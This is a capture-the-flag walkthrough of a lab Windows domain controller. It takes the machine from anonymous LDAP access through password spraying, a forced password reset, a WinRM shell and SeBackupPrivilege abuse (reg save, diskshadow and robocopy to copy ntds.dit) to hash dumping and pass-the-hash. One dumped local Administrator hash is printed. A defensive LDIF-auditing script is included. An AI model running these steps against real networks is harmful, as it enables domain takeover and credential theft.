Overview

Baby is an easy Windows machine from VL created by xct. It starts off with anonymous LDAP access, which can be used to get credentials for a domain user. The password for that user must be changed, so I’ll change it using impacket’s smbpasswd.py. I can then get a shell over WinRM with the newly set password for the user flag. For root I’ll abuse SeBackupPrivilege to back up the sam & system hives, and I’ll run those through pypykatz to dump the NTLM hashes. I can grab the Administrator’s NT hash, but when I try using it over WinRM it fails because this is the hash for the local Administrator. I’ll grab the ntds.dit file as well and run it through impacket-secretsdump along with the sam & system. This time I can get a shell through WinRM as the Domain Admin for the root flag.

Nmap Scan

I’ll start by running nmap:

獣 ~/vl/Baby/scans/tcp ➜ nmap -sCV --top-ports 10000 -T4 -vvvv 10.10.78.209 -oA baby
Nmap scan report for 10.10.78.209
Host is up, received echo-reply ttl 127 (0.17s latency).
Scanned at 2024-10-30 01:58:02 EDT for 95s
Not shown: 8355 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-10-30 05:58:40Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3269/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: BABY
| NetBIOS_Domain_Name: BABY
| NetBIOS_Computer_Name: BABYDC
| DNS_Domain_Name: baby.vl
| DNS_Computer_Name: BabyDC.baby.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-10-30T05:58:52+00:00
|_ssl-date: 2024-10-30T05:59:31+00:00; -2s from scanner time.
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Issuer: commonName=BabyDC.baby.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-07-26T09:03:15
| Not valid after: 2025-01-25T09:03:15
| MD5: a63f:e0e6:9c19:ba19:0f14:2198:bd20:3eb3
| SHA-1: 79c6:f752:73d0:6818:241e:6087:88b0:2a7f:b0bf:ec7f
| -----BEGIN CERTIFICATE-----
| MIIC4DCCAcigAwIBAgIQFwL4czAa9aBN7bpDVkexjDANBgkqhkiG9w0BAQsFADAZ
| MRcwFQYDVQQDEw5CYWJ5REMuYmFieS52bDAeFw0yNDA3MjYwOTAzMTVaFw0yNTAx
| MjUwOTAzMTVaMBkxFzAVBgNVBAMTDkJhYnlEQy5iYWJ5LnZsMIIBIjANBgkqhkiG
| 9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvntpU8oF4UIGBqJLsq7P1c3QjdjDakJb/qiQ
| oz9U+2z64TtePs20cvML7dm21cx/isH8XFlG23r1MhNl2C21Xd/gnET7piCETolV
| s+Z05Cvpm/l3TCVrg8MVxSQF8GuwxOoLI13aZ822/xiTyhsIEMH6G7hc+g3lbePr
| QKBTxcSjoohTXur97lveMYSWrBo1aLkJUYYFyhUipv637S9NAS2nF2UVIeZQbqDi
| XEy2dxNoTX0HSxfLcyNeXsvrdoh2EFPb5nAPD81Ogjrpix34hDS2Q/OTNL8hiIiI
| MpfE0JP06SCqaxkIs8X86/6vpgbh41dz659cSbL6hTyfAQPYVQIDAQABoyQwIjAT
| BgNVHSUEDDAKBggrBgEFBQcDATALBgNVHQ8EBAMCBDAwDQYJKoZIhvcNAQELBQAD
| ggEBADiIqN/vl7WhXDBvKxZpwTYdO/0Jovvp6BeucDMtCY7bj4BwifTzK2uBcGrd
| KmxOFqOub6j6wrISXTDBdU3qOLSndNyDLSihg69sMmW2toXGtgEr4VEJdl3aMflA
| fsk8bxr/qLWXSjffR+qkrEEjnxqaTb365SRYrBGPM++2yh/yz8ZHtm0catlDxG8I
| VNHzYX6m5B3VJC+lHhAdeUXDhyVvWlBbf5tHKKhY+QU4dijhMA4puS0V15dFfWDJ
| cg/QS0HaroEBpvm/Z1tz4ID1TOj5Wbuo4kz7zBnnAsphno/VRrG8bTf+niSiAbvg
| wrHcuksgbJuSK/OeFaovZ08SO9c=
|_-----END CERTIFICATE-----
5357/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: BABYDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 16177/tcp): CLEAN (Timeout)
| Check 2 (port 12240/tcp): CLEAN (Timeout)
| Check 3 (port 63385/udp): CLEAN (Timeout)
| Check 4 (port 33075/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: -1s, deviation: 0s, median: -2s
| smb2-time:
| date: 2024-10-30T05:58:53
|_ start_date: N/A

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Oct 30 01:59:37 2024 -- 1 IP address (1 host up) scanned in 95.49 seconds

These are the ports that are typically open on a Domain Controller (DC). I’ll start by checking Guest authentication in SMB, and anonymous access over LDAP and RPC.

Recon

445 - SMB

I’ll use nxc to check for Guest authentication in SMB:

獣 ~/vl/Baby/enumeration ➜ nxc smb 10.10.78.209 -u Guest -p '' --shares
SMB 10.10.78.209 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
SMB 10.10.78.209 445 BABYDC [-] baby.vl\Guest: STATUS_ACCOUNT_DISABLED

The Guest account is disabled so SMB isn’t a target currently.

135 - RPC

I’ll check for anonymous access via rpcclient:

獣 ~/vl/Baby/enumeration ➜ rpcclient -U "" 10.10.78.209
Password for [WORKGROUP\]:
Cannot connect to server. Error was NT_STATUS_LOGON_FAILURE

I get a logon failure error, so anonymous access for RPC is disabled.

389 - LDAP

The nxc output shows the FQDN (BABYDC.baby.vl), so I’ll add it to my /etc/hosts file:

10.10.78.209	BABYDC.baby.vl baby.vl

To test anonymous access, I’ll use ldapsearch to dump all of the information:

獣 ~/vl/Baby/enumeration ➜ ldapsearch -H ldap://BABYDC.baby.vl -x -b "DC=baby,DC=vl"
# extended LDIF
#
# LDAPv3
# base <DC=baby,DC=vl> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# baby.vl
dn: DC=baby,DC=vl

# Administrator, Users, baby.vl
dn: CN=Administrator,CN=Users,DC=baby,DC=vl

...snip...

This was successful, so I’ll start by enumerating LDAP.

Shell as caroline.robinson

Finding The Password

I’ll run the ldapsearch command again, and this time I’ll save the output into a file named ldap-anonymous:

獣 ~/vl/Baby/enumeration ➜ ldapsearch -H ldap://BABYDC.baby.vl -x -b "DC=baby,DC=vl" > ldap-anonymous
獣 ~/vl/Baby/enumeration ➜ ls
ldap-anonymous

Next I’ll search for distinguishedName, which gives me a list of every user and group:

獣 ~/vl/Baby/enumeration ➜ cat ldap-anonymous | grep 'distinguishedName'
distinguishedName: CN=Guest,CN=Users,DC=baby,DC=vl
distinguishedName: CN=Domain Computers,CN=Users,DC=baby,DC=vl
distinguishedName: CN=Cert Publishers,CN=Users,DC=baby,DC=vl
distinguishedName: CN=Domain Users,CN=Users,DC=baby,DC=vl
distinguishedName: CN=Domain Guests,CN=Users,DC=baby,DC=vl
distinguishedName: CN=Group Policy Creator Owners,CN=Users,DC=baby,DC=vl
distinguishedName: CN=RAS and IAS Servers,CN=Users,DC=baby,DC=vl
distinguishedName: CN=Allowed RODC Password Replication Group,CN=Users,DC=baby
distinguishedName: CN=Denied RODC Password Replication Group,CN=Users,DC=baby,
distinguishedName: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=baby
distinguishedName: CN=Cloneable Domain Controllers,CN=Users,DC=baby,DC=vl
distinguishedName: CN=Protected Users,CN=Users,DC=baby,DC=vl
distinguishedName: CN=DnsAdmins,CN=Users,DC=baby,DC=vl
distinguishedName: CN=DnsUpdateProxy,CN=Users,DC=baby,DC=vl
distinguishedName: CN=dev,CN=Users,DC=baby,DC=vl
distinguishedName: CN=Jacqueline Barnett,OU=dev,DC=baby,DC=vl
distinguishedName: CN=Ashley Webb,OU=dev,DC=baby,DC=vl
distinguishedName: CN=Hugh George,OU=dev,DC=baby,DC=vl
distinguishedName: CN=Leonard Dyer,OU=dev,DC=baby,DC=vl
distinguishedName: CN=it,CN=Users,DC=baby,DC=vl
distinguishedName: CN=Connor Wilkinson,OU=it,DC=baby,DC=vl
distinguishedName: CN=Joseph Hughes,OU=it,DC=baby,DC=vl
distinguishedName: CN=Kerry Wilson,OU=it,DC=baby,DC=vl
distinguishedName: CN=Teresa Bell,OU=it,DC=baby,DC=vl
distinguishedName: CN=Caroline Robinson,OU=it,DC=baby,DC=vl

One common thing I see when I have anonymous LDAP access is sensitive information in the description attribute of a group or user, so I’ll search for description:

獣 ~/vl/Baby/enumeration ➜ cat ldap-anonymous | grep 'description' -A2
description: Built-in account for guest access to the computer/domain
distinguishedName: CN=Guest,CN=Users,DC=baby,DC=vl
instanceType: 4
...snip...
description: Set initial password to BabyStart123!
givenName: Teresa
distinguishedName: CN=Teresa Bell,OU=it,DC=baby,DC=vl

I can see that the description for the Teresa user contains some juicy info:

Set initial password to BabyStart123!

Based on the description, I’ll guess that the password I found is the Teresa user’s default password.
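The grep above works on this dump, but ldapsearch’s LDIF output folds long values onto continuation lines (the truncated DNs in the distinguishedName listing show this happening) and base64-encodes values behind a "::" separator, so a plain grep can miss a description or show only half of it. As an added example that is not part of the original post, here is a small Python audit script that parses LDIF properly and flags every description mentioning a password, which is the check a domain owner would run against their own directory. The LDIF excerpt, the example.test domain and the account names in it are constructed for the example.

```python
import base64
import re
from typing import Dict, List, Tuple

# Constructed LDIF excerpt in the shape of ldapsearch output (not the real dump
# from this machine). It exercises the two cases a plain grep mishandles:
# a value folded onto a continuation line, and a base64 ("::") value.
_ENCODED_DESC = base64.b64encode(b"temp pwd: Winter2024").decode()
SAMPLE_LDIF = f"""\
# extended LDIF
#
# LDAPv3
# base <DC=example,DC=test> with scope subtree

# Guest, Users, example.test
dn: CN=Guest,CN=Users,DC=example,DC=test
description: Built-in account for guest access to the computer/domain
sAMAccountName: Guest

# Some User, it, example.test
dn: CN=Some User,OU=it,DC=example,DC=test
description: Set initial password to
  Example123!
sAMAccountName: some.user

# Other User, dev, example.test
dn: CN=Other User,OU=dev,DC=example,DC=test
description:: {_ENCODED_DESC}
sAMAccountName: other.user

# Clean User, dev, example.test
dn: CN=Clean User,OU=dev,DC=example,DC=test
description: Developer, joined 2021
sAMAccountName: clean.user
"""

# "attr: value" or "attr:: base64value"
_ATTR_LINE = re.compile(r"^([^:]+)(::?) ?(.*)$")


def parse_ldif(text: str) -> List[Dict[str, List[str]]]:
    """Parse LDIF text into a list of entries (attribute -> list of values).

    Handles '#' comment lines, folded continuation lines (a leading single
    space joins the line to the previous one) and base64 values ('attr:: ...').
    Entries are separated by blank lines.
    """
    # Step 1: unfold continuation lines.
    logical: List[str] = []
    for raw in text.splitlines():
        if raw.startswith(" ") and logical:
            logical[-1] += raw[1:]
        else:
            logical.append(raw)

    # Step 2: split into entries and decode attribute values.
    entries: List[Dict[str, List[str]]] = []
    current: Dict[str, List[str]] = {}
    for line in logical:
        if line.startswith("#"):
            continue
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        match = _ATTR_LINE.match(line)
        if not match:
            continue  # tolerate anything that is not 'attr: value'
        attr, sep, value = match.groups()
        if sep == "::":
            value = base64.b64decode(value).decode("utf-8", errors="replace")
        current.setdefault(attr, []).append(value)
    if current:
        entries.append(current)
    return entries


# Words that suggest a credential was written into a description attribute.
_PASSWORD_HINT = re.compile(r"\b(password|passwd|pwd|pass)\b", re.IGNORECASE)


def find_password_hints(entries: List[Dict[str, List[str]]]) -> List[Tuple[str, str]]:
    """Return (dn, description) for every entry whose description mentions a password."""
    findings = []
    for entry in entries:
        for desc in entry.get("description", []):
            if _PASSWORD_HINT.search(desc):
                findings.append((entry["dn"][0], desc))
    return findings


if __name__ == "__main__":
    for dn, desc in find_password_hints(parse_ldif(SAMPLE_LDIF)):
        print(f"{dn}\n    description: {desc}")
```

Run it against a real dump by replacing SAMPLE_LDIF with the contents of the ldap-anonymous file. The keyword list is deliberately small; extend it with whatever your help desk habitually writes into descriptions, and treat every hit as a credential to rotate, not just a note to delete.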

Testing The Creds

I’ll test the creds I found on the Teresa user. To do this I need the user’s actual username, so I’ll extract all of the usernames from the saved ldapsearch output and write them to a file named users.txt:

獣 ~/vl/Baby/enumeration ➜ cat ldap-anonymous | grep 'userPrincipalName' | awk -F 'userPrincipalName: |@' '{print $2}'
Jacqueline.Barnett
Ashley.Webb
Hugh.George
Leonard.Dyer
Connor.Wilkinson
Joseph.Hughes
Kerry.Wilson
Teresa.Bell
Caroline.Robinson
獣 ~/vl/Baby/enumeration ➜ cat ldap-anonymous | grep 'userPrincipalName' | awk -F 'userPrincipalName: |@' '{print $2}' > users.txt

The username I am looking for is Teresa.Bell, so I’ll try to authenticate to SMB using the password I found in LDAP:

獣 ~/vl/Baby/enumeration ➜ nxc smb BABYDC.baby.vl -u Teresa.Bell -p 'BabyStart123!' --shares
SMB 10.10.78.209 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
SMB 10.10.78.209 445 BABYDC [-] baby.vl\Teresa.Bell:BabyStart123! STATUS_LOGON_FAILURE

I get a logon failure error, which means this user’s password has probably been changed to something else. Seeing as the password was set as the initial password, it might be the default password used across the domain. I’ll use kerbrute to see if I can find any other users who haven’t changed their password yet.

Spraying The Creds

I’ll run kerbrute with the users.txt file and the password that I want to spray:

獣 ~/vl/Baby/enumeration ➜ kerbrute passwordspray --dc BABYDC.baby.vl -d baby.vl users.txt 'BabyStart123!'

__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 10/30/24 - Ronnie Flathers @ropnop

2024/10/30 02:21:16 > Using KDC(s):
2024/10/30 02:21:16 > BABYDC.baby.vl:88

2024/10/30 02:21:16 > [+] VALID LOGIN: Caroline.Robinson@baby.vl:BabyStart123!
2024/10/30 02:21:16 > Done! Tested 9 logins (1 successes) in 0.366 seconds

Changing The User’s Password

I get one valid login, so I’ll test the authentication over SMB via nxc:

獣 ~/vl/Baby/enumeration ➜ nxc smb BABYDC.baby.vl -u Caroline.Robinson -p 'BabyStart123!' --shares
SMB 10.10.78.209 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
SMB 10.10.78.209 445 BABYDC [-] baby.vl\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE

The error I received tells me that this user’s password was in fact the default password used across the domain. The reason the authentication didn’t work is that this user’s password has expired because they haven’t changed it yet. I can take advantage of this using impacket’s smbpasswd.py to change the user’s password:

獣 ~/vl/Baby/enumeration ➜ smbpasswd.py baby.vl/'Caroline.Robinson':'BabyStart123!'@BABYDC.baby.vl -newpass 'S3cur3P4ssw0rd!'
Impacket v0.12.0.dev1+20240509.95404.2a65d8d9 - Copyright 2023 Fortra

===============================================================================
Warning: This functionality will be deprecated in the next Impacket version
===============================================================================

[!] Password is expired, trying to bind with a null session.
[*] Password was changed successfully.

The password was changed successfully to S3cur3P4ssw0rd!.

Shell as Caroline.Robinson

I’ll try to authenticate to SMB with the new password that I set:

獣 ~/vl/Baby/enumeration ➜ nxc smb BABYDC.baby.vl -u Caroline.Robinson -p 'S3cur3P4ssw0rd!' --shares
SMB 10.10.78.209 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
SMB 10.10.78.209 445 BABYDC [+] baby.vl\Caroline.Robinson:S3cur3P4ssw0rd!
SMB 10.10.78.209 445 BABYDC [*] Enumerated shares
SMB 10.10.78.209 445 BABYDC Share Permissions Remark
SMB 10.10.78.209 445 BABYDC ----- ----------- ------
SMB 10.10.78.209 445 BABYDC ADMIN$ READ Remote Admin
SMB 10.10.78.209 445 BABYDC C$ READ,WRITE Default share
SMB 10.10.78.209 445 BABYDC IPC$ READ Remote IPC
SMB 10.10.78.209 445 BABYDC NETLOGON READ Logon server share
SMB 10.10.78.209 445 BABYDC SYSVOL READ Logon server share

The authentication worked, but all of the shares are default. I’ll check if I have access to WinRM:

獣 ~/vl/Baby/enumeration ➜ nxc winrm BABYDC.baby.vl -u Caroline.Robinson -p 'S3cur3P4ssw0rd!'
WINRM 10.10.78.209 5985 BABYDC [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl)
WINRM 10.10.78.209 5985 BABYDC [+] baby.vl\Caroline.Robinson:S3cur3P4ssw0rd! (Pwn3d!)

I do have WinRM access, so I’ll use evil-winrm for a shell:

獣 ~/vl/Baby/enumeration ➜ evil-winrm -i BABYDC.baby.vl -u Caroline.Robinson -p 'S3cur3P4ssw0rd!'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents>

I got a shell, and with that I can read the user flag:

*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> ls


Directory: C:\Users\Caroline.Robinson\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/21/2016 3:36 PM 527 EC2 Feedback.website
-a---- 6/21/2016 3:36 PM 554 EC2 Microsoft Windows Guide.website
-a---- 11/21/2021 3:24 PM 36 user.txt


*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> cat user.txt
VL{<redacted>}

Shell as Administrator

Getting The sam & system

I’ll start by running whoami /all to see my user privileges and groups:

*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> whoami /all

USER INFORMATION
----------------

User Name SID
====================== ==============================================
baby\caroline.robinson S-1-5-21-1407081343-4001094062-1444647654-1115


GROUP INFORMATION
-----------------

Group Name Type SID Attributes
========================================== ================ ============================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
BABY\it Group S-1-5-21-1407081343-4001094062-1444647654-1109 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

I have SeBackupPrivilege and I’m in the BUILTIN\Backup Operators group. This allows me to read basically any file I want. I’ll back up the sam & system hives, which I can then use to dump the NTLM hashes locally via pypykatz. I’ll start by saving the sam & system:

*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> mkdir C:\temp


Directory: C:\


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/30/2024 6:37 AM temp


*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> reg save hklm\sam c:\Temp\sam
The operation completed successfully.

*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> reg save hklm\system c:\Temp\system

The operation completed successfully.

Nice, now I’ll download both of these files using the download feature in evil-winrm:

*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> cd C:\temp
*Evil-WinRM* PS C:\temp> download sam

Info: Downloading C:\temp\sam to sam

Info: Download successful!
*Evil-WinRM* PS C:\temp> download system

Info: Downloading C:\temp\system to system

Info: Download successful!

Dumping Hashes via pypykatz

I can use pypykatz to dump the hashes from those two files:

獣 ~/vl/Baby/enumeration ➜ pypykatz registry --sam sam system
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8d992faed38128ae85e95fa35868bb43:::

Shell over WinRM (Fail)

Now I’ll try to connect over WinRM:

獣 ~/vl/Baby/enumeration ➜ evil-winrm -i BABYDC.baby.vl -u Administrator -H '8d992faed38128ae85e95fa35868bb43'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

Error: Exiting with code 1

The authentication failed, but why? The NT hash failed because it is the hash for the local Administrator, not the Domain Admin. I just need to grab the ntds.dit file as well, and then I can use all three files with impacket-secretsdump to get the actual Domain Admin’s NT hash.

Using impacket-secretsdump

To do this I’ll use the following diskshadow script:

set metadata C:\Windows\Temp\meta.cabX
set context clientaccessibleX
set context persistentX
begin backupX
add volume C: alias cdriveX
createX
expose %cdrive% E:X
end backupX

I’ll put this script in a file named script.txt and I’ll upload it to the machine using the upload feature in evil-winrm:

*Evil-WinRM* PS C:\temp> upload script.txt

Info: Uploading /root/vl/Baby/enumeration/script.txt to C:\temp\script.txt

Data: 232 bytes of 232 bytes copied

Info: Upload successful!

Now I’ll run diskshadow:

*Evil-WinRM* PS C:\temp> diskshadow /s script.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: BABYDC, 10/30/2024 6:54:55 AM

-> set metadata C:\Windows\Temp\meta.cab
-> set context clientaccessible
-> set context persistent
-> begin backup
-> add volume C: alias cdrive
-> create
...snip...
The shadow copy was successfully exposed as E:\.
-> end backup

And now I can copy the ntds.dit to C:\temp via robocopy:

*Evil-WinRM* PS C:\temp> robocopy /b E:\Windows\ntds . ntds.dit

-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------

Started : Wednesday, October 30, 2024 6:56:53 AM
Source : E:\Windows\ntds\
Dest : C:\temp\

Files : ntds.dit

...snip...

Speed : 76,608,292 Bytes/sec.
Speed : 4,383.562 MegaBytes/min.
Ended : Wednesday, October 30, 2024 6:56:53 AM

*Evil-WinRM* PS C:\temp> ls


Directory: C:\temp


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/30/2024 6:55 AM 16777216 ntds.dit
-a---- 10/30/2024 6:37 AM 49152 sam
-a---- 10/30/2024 6:54 AM 175 script.txt
-a---- 10/30/2024 6:37 AM 16654336 system

Now I’ll download ntds.dit and I’ll run all three files through impacket-secretsdump:

獣 ~/vl/Baby/enumeration ➜ impacket-secretsdump -sam sam -system system -ntds ntds.dit LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<redacted>:::

Shell as Administrator (success)

I’ll try to get a shell over WinRM with the new hash:

獣 ~/vl/Baby/enumeration ➜ evil-winrm -i BABYDC.baby.vl -u Administrator -H '<redacted>'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

This worked, and with that I can read the root flag:

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


Directory: C:\Users\Administrator\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/21/2021 3:22 PM 36 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
VL{<redacted>}

Thoughts

Baby was a pretty good machine; anonymous LDAP access is something I don’t see too often, so it was nice to get a refresher. I also never knew that just using the sam & system doesn’t always work, so this was new for me and I learned a lot.